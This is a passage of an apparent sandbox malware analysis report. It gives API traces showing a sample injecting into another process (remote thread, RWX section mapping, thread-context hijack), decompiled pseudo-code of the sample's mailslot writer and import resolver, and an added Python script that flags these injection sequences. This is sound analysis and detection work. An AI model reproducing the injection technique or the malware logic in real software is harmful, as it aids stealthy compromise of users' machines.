    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:479B945127CC75C2A44ED1B13482FB07
Total matches:36
Initial Analysis Report:Open
Initial sample Analysis ID:67591
Initial sample SHA 256:CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:yyy.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
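The function listings above (OpenProcess/CreateRemoteThread at 002E2452 and 002E24AC, the VirtualProtectEx/ResumeThread/WaitForSingleObject/SuspendThread chain in 002E1A30 and 002E22D2, NtCreateSection at 002E27EA with NtMapViewOfSection in 002E2750, NtAllocateVirtualMemory at 002E3E99, NtWriteVirtualMemory at 002E3E45 and NtSetContextThread at 002E3974) only show raw argument values. The script below is an added example, written for this page and not part of the Joe Sandbox report or of the sample. It parses the report's "APIs" lines, decodes the OpenProcess access masks, page protections and CreateRemoteThread creation flags, and flags the injection call sequences. Assumptions: the argument positions it inspects are the documented parameter positions (VirtualProtectEx flNewProtect is the 4th parameter, NtCreateSection SectionPageProtection the 5th, NtAllocateVirtualMemory Protect the 6th, NtMapViewOfSection Win32Protect the 10th, CreateRemoteThread dwCreationFlags the 6th); the TRACE input is constructed by copying lines from the listings above in call order; and reading the 0xCCCCFEEB stack value as an `EB FE CC CC` self-jump stub written at the suspended thread's start address is my interpretation of the sequence, not something the report states. All function and constant names are my own.

```python
"""Added example (not part of the report or sample): triage the "APIs" trace lines of a
Joe Sandbox function listing, decode the masks/flags the sample passes, and flag the
process-injection call sequence that the listings above show."""
import re

# Constructed input: lines copied from the listing above, in call order, keeping the
# report's bullets and "Part of subcall function" prefixes to show the parser copes.
TRACE = r"""
• Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
• OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
• CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
• Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
• Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
• ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
• WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
• SuspendThread.KERNELBASE(?), ref: 002E23A1
• NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
• Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
• NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
• NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
• ResumeThread.KERNELBASE(?), ref: 002E2418
• HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
"""

LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
PROCESS_RIGHTS = {  # PROCESS_* and standard rights, bit values as in winnt.h
    0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x4: "PROCESS_SET_SESSIONID",
    0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
    0x40: "PROCESS_DUP_HANDLE", 0x80: "PROCESS_CREATE_PROCESS", 0x100: "PROCESS_SET_QUOTA",
    0x200: "PROCESS_SET_INFORMATION", 0x400: "PROCESS_QUERY_INFORMATION",
    0x800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE"}
PAGE_EXECUTE_READWRITE, CREATE_SUSPENDED = 0x40, 0x4
# Position of the page-protection parameter in each API's documented signature.
PROTECT_SLOT = {"VirtualProtectEx": 3, "NtCreateSection": 4, "NtAllocateVirtualMemory": 5,
                "NtMapViewOfSection": 9}
# Call sequences that must appear in this relative order somewhere in the trace.
SEQUENCES = {
    "remote_thread_injection": ["OpenProcess", "CreateRemoteThread"],
    "suspended_thread_spin": ["CreateRemoteThread", "VirtualProtectEx", "ResumeThread",
                              "WaitForSingleObject", "SuspendThread"],
    "rwx_section_mapping": ["NtCreateSection", "NtMapViewOfSection"],
    "thread_context_hijack": ["NtWriteVirtualMemory", "NtSetContextThread", "ResumeThread"]}

def parse_arg(tok):
    """8-hex-digit tokens become ints; '?' (unresolved) and inline strings become None."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None

def parse_trace(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            raw = m.group("args")
            events.append({"api": m.group("api"), "module": m.group("module"),
                           "args": [parse_arg(a) for a in raw.split(",")] if raw else [],
                           "ref": int(m.group("ref"), 16)})
    return events

def decode_mask(value, table):
    """Split an access mask into its named bits plus any bits the table does not know."""
    known = sum(table)  # keys are distinct single bits, so their sum equals their OR
    return sorted(n for bit, n in table.items() if value & bit), value & ~known

def decode_patch_dword(value):
    """Read a 32-bit immediate as little-endian x86 bytes and recognise a 'jmp $' stub."""
    b = value.to_bytes(4, "little")
    info = {"bytes": b.hex(), "self_loop": False, "int3_padding": False}
    if b[0] == 0xEB:  # JMP rel8; displacement is relative to the end of the 2-byte instruction
        info["self_loop"] = 2 + int.from_bytes(b[1:2], "little", signed=True) == 0
        info["int3_padding"] = all(x == 0xCC for x in b[2:])
    return info

def in_order(apis, seq):
    """True when every API in seq occurs in apis, in that relative order (gaps allowed)."""
    it = iter(apis)
    return all(any(api == step for api in it) for step in seq)

def triage(text):
    events = parse_trace(text)
    apis = [e["api"] for e in events]
    hits = {name: in_order(apis, seq) for name, seq in SEQUENCES.items()}
    hits.update(process_access=[], rwx_refs=[], create_suspended=False, self_jump_stub=False)
    for e in events:
        a, api = e["args"], e["api"]
        if api == "OpenProcess" and a and a[0] is not None:
            hits["process_access"].append((e["ref"], decode_mask(a[0], PROCESS_RIGHTS)[0]))
        if api == "CreateRemoteThread" and len(a) > 5 and a[5] is not None:
            hits["create_suspended"] = bool(a[5] & CREATE_SUSPENDED)  # dwCreationFlags
        slot = PROTECT_SLOT.get(api)
        if slot is not None and len(a) > slot and a[slot] == PAGE_EXECUTE_READWRITE:
            hits["rwx_refs"].append(e["ref"])
        if any(v is not None and decode_patch_dword(v)["self_loop"] for v in a):
            hits["self_jump_stub"] = True  # 0xCCCCFEEB on the stack = EB FE CC CC
    return events, hits
```

Run `triage(TRACE)` to get the parsed events and the indicator dictionary. Two caveats when pointing this at a full report: the tracer prints more argument slots than the API has parameters (OpenProcess takes three, the listing shows fourteen), so everything past the documented arity is stack residue and must not be interpreted; and `?` marks a value the tracer could not resolve, which the parser maps to None rather than guessing. Two decoded values worth knowing: 0x1F0FFF is PROCESS_ALL_ACCESS as the SDK defines it for pre-Vista targets (it expands to 0x1FFFFF when _WIN32_WINNT is 0x0600 or later), and the 0x00000004 passed as CreateRemoteThread's dwCreationFlags is CREATE_SUSPENDED, which is what makes the later ResumeThread / 100 ms WaitForSingleObject / SuspendThread chain in 002E22D2 meaningful.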
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0; // bytes written so far
				// open the mailslot client side with GENERIC_WRITE (0x40000000) and OPEN_EXISTING (3);
				// retry every 100 ms while the error is 2 (ERROR_FILE_NOT_FOUND), i.e. until the reader has created it
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				// build the payload: E0040171F returns the buffer in _a4 and its length in _v24
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb; // ERROR_BAD_FORMAT
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24; // bytes remaining
				_push(_t48);
				// send the buffer as messages of at most 0x1000 bytes
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) { // only 0x79 (ERROR_SEM_TIMEOUT) is retried
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						// if the last message was a full 0x1000 bytes, re-send the final byte as a short message
						// so the reader, which stops on the first message shorter than 0x1000, terminates
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8); // wipe the payload before releasing it
				E00401207(_t52); // HeapFree (see APIs below)
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				// resolves the import table of a PE image mapped at __edi; _a4 points at its IMAGE_NT_HEADERS32
				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); // import directory RVA (DataDirectory[1].VirtualAddress)
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; // first IMAGE_IMPORT_DESCRIPTOR
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); // descriptor.Name (RVA of the DLL name)
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); // wipe the DLL name once the module is loaded
					_t27 =  *_t34; // descriptor.OriginalFirstThunk
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); // descriptor.FirstThunk (the IAT to patch)
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); // Name of the next descriptor (0x14 + 0xc)
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
